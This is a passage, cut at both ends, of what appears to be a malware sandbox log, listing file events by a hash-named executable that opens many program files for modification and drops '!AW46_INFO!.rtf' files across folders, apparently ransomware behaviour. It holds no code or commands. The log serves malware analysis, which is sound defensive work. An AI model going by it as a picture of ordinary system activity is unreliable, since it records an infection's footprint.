Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata.nl_ja_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Sakhalin 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\VDK10.SYD 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_zh_TW.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.annotation_1.2.0.v201401042248.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-editor-mimelookup-impl.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7Handle.png 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\default_apps\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Baghdad 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\jfluid-server-15.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Eucla 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\toc.gif 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Settings.zip 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\epl-v10.html 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Damascus 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\am\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\content-types.properties 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.ja_5.5.0.165303\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.rcp.product_5.5.0.165303\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-6 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\drvDX9.x3d 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\epl-v10.html 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.common_5.5.0.165303.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\plugin.properties 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.updatechecker.nl_ja_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\ReceiveDismount.mpeg 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-autoupdate-ui.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\sk\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Jerusalem 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Easter 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\topnav.gif 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-print_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Vienna 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-api.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Rio_Gallegos 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host-views_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\hr.pak 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.nl_zh_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\feature.properties 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.operations.nl_zh_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Funafuti 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\AST4ADT 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\fur\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\about.html 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Anchorage 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Miquelon 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\nl\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\skins\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-actions_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\VisualElements\VisualElements_70.png 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\Data1.cab 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-core-kit.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Srednekolymsk 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.el_2.2.0.v201303151357.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\pt_PT\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\rmid.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-profiling.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\eBook.api 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages.properties 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\acro20.lng 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\cmm\sRGB.pf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\config.ini 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\klist.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Efate 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\asl-v20.txt 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Riyadh88 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\playlist.json 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\feature.properties 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Class.zip 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+3 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\PST8PDT 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\liveleak.luac 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\boot_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-jvmstat.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui.configuration_5.5.0.165303.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Kamchatka 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\CST6CDT 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Broken_Hill 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.server_8.1.14.v20131031.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Efate 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\nbexec.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.nl_zh_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\YST9YDT 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_classic_winxp.css 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jre7\lib\amd64\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.attach.zh_CN_5.5.0.165303.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\twitch.luac 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Palau 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\sl\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\chrome.exe.sig 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\epl-v10.html 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-actions_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\bookbig.gif 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\org-openide-util-lookup_zh_CN.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-cli_ja.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\sunjce_provider.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.base.nl_ja_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-text.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Nassau 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Gibraltar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Kiritimati 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-application.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\classfile_constants.h 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\dblook 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Google\Update\1.3.35.452\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-explorer.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\ECLIPSE_.SF 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Khandyga 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.base.nl_zh_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.jarprocessor.nl_ja_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-applemenu.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\zh_CN\LC_MESSAGES\vlc.mo 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\as_IN\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.garbagecollector_1.0.200.v20131115-1210.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\idlj.exe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\javafx.properties 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\vi\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+12 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.security.win32.x86_64_1.0.100.v20130327-1442.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Tucuman 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\fontconfig.bfc 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\about.html 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net.win32.x86_64.nl_ja_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\UserControl.zip 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\images\cursors\win32_LinkDrop32x32.gif 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jre7\lib\zi\Antarctica\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Rio_Gallegos 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\VideoLAN\VLC\COPYING.txt 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.natives.nl_zh_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Yakutat 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Mahe 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\wa\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Form.zip 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.nl_zh_4.4.0.v20140623020002.jar 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\tl\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program 